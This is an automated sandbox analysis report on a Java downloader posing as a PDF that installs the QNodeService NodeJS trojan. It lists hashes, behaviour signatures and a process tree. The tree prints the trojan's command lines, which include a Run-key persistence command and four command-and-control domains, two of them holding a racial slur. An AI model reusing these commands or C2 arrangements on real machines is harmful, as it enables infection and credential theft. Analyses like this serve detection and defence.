Analysis
-
max time kernel
66s -
max time network
145s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 09:55
Static task
static1
Behavioral task
behavioral1
Sample
CONSULTA PLASTOMEX 00671__pdf.jar
Resource
win7
Behavioral task
behavioral2
Sample
CONSULTA PLASTOMEX 00671__pdf.jar
Resource
win10v200430
General
-
Target
CONSULTA PLASTOMEX 00671__pdf.jar
-
Size
11KB
-
MD5
a606c29fff75cdd6d6d9731712a47d72
-
SHA1
02b0dc7bb973fd0ead73cd85b3b8a34ff2644440
-
SHA256
01aed0709103132b5ec407879fa57e8130696922843d92bffbed8075c7d8ce0e
-
SHA512
c917378781f67f9b997c5ecfd1a4094c96b3cee7b9493839d5f2a865e80545c8f46d223765fc9c8a7c0003f848da808bc01ac3531e753c9e8009262a2ae44c9e
Malware Config
Signatures
-
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bf9a-111.dat family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-4f9a1ccf = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-4f9a1ccf.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 428 wrote to memory of 3152 428 java.exe 67 PID 428 wrote to memory of 3152 428 java.exe 67 PID 3152 wrote to memory of 2540 3152 node.exe 68 PID 3152 wrote to memory of 2540 3152 node.exe 68 PID 2540 wrote to memory of 4092 2540 cmd.exe 69 PID 2540 wrote to memory of 4092 2540 cmd.exe 69 PID 3152 wrote to memory of 2160 3152 node.exe 72 PID 3152 wrote to memory of 2160 3152 node.exe 72 -
Loads dropped DLL 4 IoCs
pid Process 2160 node.exe 2160 node.exe 2160 node.exe 2160 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 wtfismyip.com 12 wtfismyip.com -
Executes dropped EXE 2 IoCs
pid Process 3152 node.exe 2160 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2160 node.exe 2160 node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\CONSULTA PLASTOMEX 00671__pdf.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\""4⤵
- Adds Run entry to start application
PID:4092
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net3⤵
- Checks processor information in registry
- Loads dropped DLL
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-